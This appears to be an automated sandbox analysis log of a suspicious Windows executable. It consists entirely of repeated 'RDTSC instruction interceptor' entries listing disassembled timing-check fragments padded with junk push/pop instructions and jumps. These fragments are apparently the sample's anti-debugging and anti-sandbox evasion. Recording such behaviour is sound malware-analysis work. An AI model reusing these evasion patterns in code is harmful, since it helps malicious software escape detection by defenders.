Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FDEABB second address: FDEAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FE68FA second address: FE68FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FE4C14 second address: FE4C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F11753296A6h 0x0000000a pop edx 0x0000000b pop esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FE4C25 second address: FE4C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FE4C2B second address: FE4C49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296ADh 0x00000007 jmp 00007F11753296AAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FE4C49 second address: FE4C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FE4D9D second address: FE4DA8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F11753296A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FE4DA8 second address: FE4DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F1174CFE2C5h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jc 00007F1174CFE2B6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FE4DD0 second address: FE4DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FE4DDF second address: FE4DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FE5B6C second address: FE5B90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F11753296AEh 0x00000008 jmp 00007F11753296B1h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FE5B90 second address: FE5B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FE5E20 second address: FE5E32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edi 0x00000006 pop edi 0x00000007 jne 00007F11753296A6h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FE5E32 second address: FE5E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FE5E36 second address: FE5E3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FE6110 second address: FE611F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1174CFE2B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FE611F second address: FE6125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FED55E second address: FED564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FED564 second address: FED571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FED571 second address: FED575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FED575 second address: FED587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F11753296AEh 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FED587 second address: FED58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FED58B second address: FED5AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F11753296B4h 0x00000008 je 00007F11753296A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FED5AA second address: FED5C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F1174CFE2C7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF2A8C second address: FF2A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF2A90 second address: FF2AB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2C5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F1174CFE2BBh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF2AB9 second address: FF2ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF2ABF second address: FF2AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1174CFE2C8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F1174CFE2B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF1C22 second address: FF1C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF1D86 second address: FF1D94 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnc 00007F1174CFE2B6h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF1D94 second address: FF1D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF206B second address: FF2090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2C1h 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F1174CFE2B6h 0x0000000f jmp 00007F1174CFE2BAh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF2090 second address: FF2094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF24A2 second address: FF24C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop esi 0x00000008 push ebx 0x00000009 jmp 00007F1174CFE2C5h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF2754 second address: FF27AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007F11753296B3h 0x0000000b pop edi 0x0000000c pushad 0x0000000d jmp 00007F11753296AFh 0x00000012 jmp 00007F11753296ADh 0x00000017 jg 00007F11753296BFh 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF27AD second address: FF27B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF27B1 second address: FF27CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296B9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FFA7E4 second address: FFA7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF8AB4 second address: FF8ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF8ABA second address: FF8AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF8F48 second address: FF8F8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d jnp 00007F11753296A6h 0x00000013 pop edi 0x00000014 jmp 00007F11753296B3h 0x00000019 je 00007F11753296AEh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF9260 second address: FF9265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF9265 second address: FF926B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF926B second address: FF926F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF926F second address: FF9273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF953D second address: FF9541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF9541 second address: FF9547 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF9547 second address: FF9579 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1174CFE2C7h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF9579 second address: FF957F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FFA601 second address: FFA636 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2BFh 0x00000007 ja 00007F1174CFE2B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f ja 00007F1174CFE2C2h 0x00000015 jng 00007F1174CFE2B6h 0x0000001b jnp 00007F1174CFE2B6h 0x00000021 push eax 0x00000022 push edx 0x00000023 jnp 00007F1174CFE2B6h 0x00000029 push edx 0x0000002a pop edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FF84BD second address: FF84DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 je 00007F11753296A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F11753296B2h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 100D23C second address: 100D250 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F1174CFE2B6h 0x0000000e jnc 00007F1174CFE2B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 100D250 second address: 100D282 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F11753296A6h 0x00000008 jmp 00007F11753296B8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F11753296ABh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 100CDC4 second address: 100CDCE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1174CFE2B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 100CF5C second address: 100CF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 100CF62 second address: 100CF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 100CF68 second address: 100CF6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 100CF6E second address: 100CF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F1174CFE2C6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 10112E9 second address: 10112ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 10138A7 second address: 10138AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 10138AD second address: 10138B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 10138B2 second address: 10138B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 10138B7 second address: 10138E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F11753296B1h 0x0000000c jmp 00007F11753296B8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 1020125 second address: 1020135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 1020135 second address: 102013B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 102013B second address: 1020155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1174CFE2C3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 1024AF1 second address: 1024B0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296B5h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 1024B0E second address: 1024B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 102CDEB second address: 102CDEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 102CDEF second address: 102CDF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 102CDF3 second address: 102CE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F11753296B2h 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 102CE14 second address: 102CE1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 102B780 second address: 102B786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 102B786 second address: 102B7A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1174CFE2C7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 102B7A3 second address: 102B7C6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jc 00007F11753296B7h 0x0000000f jmp 00007F11753296B1h 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 102C024 second address: 102C02A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 102C02A second address: 102C030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 102C030 second address: 102C035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 102E374 second address: 102E37E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F11753296A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 102E37E second address: 102E392 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2BBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 102FA74 second address: 102FA78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 102FA78 second address: 102FA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 102FA81 second address: 102FAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11753296ADh 0x00000009 jng 00007F11753296A6h 0x0000000f popad 0x00000010 je 00007F11753296ACh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 10335C2 second address: 10335E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1174CFE2C4h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 104C7E9 second address: 104C7ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 104C7ED second address: 104C7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F1174CFE2B6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 104EEB3 second address: 104EEB9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 10551B6 second address: 10551C1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 10551C1 second address: 10551E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F11753296A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jno 00007F11753296A8h 0x00000013 popad 0x00000014 push edx 0x00000015 push edi 0x00000016 je 00007F11753296A6h 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 10551E6 second address: 10551EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 1055462 second address: 105547A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296B3h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 1061A1B second address: 1061A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 1061A20 second address: 1061A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 1061A26 second address: 1061A33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
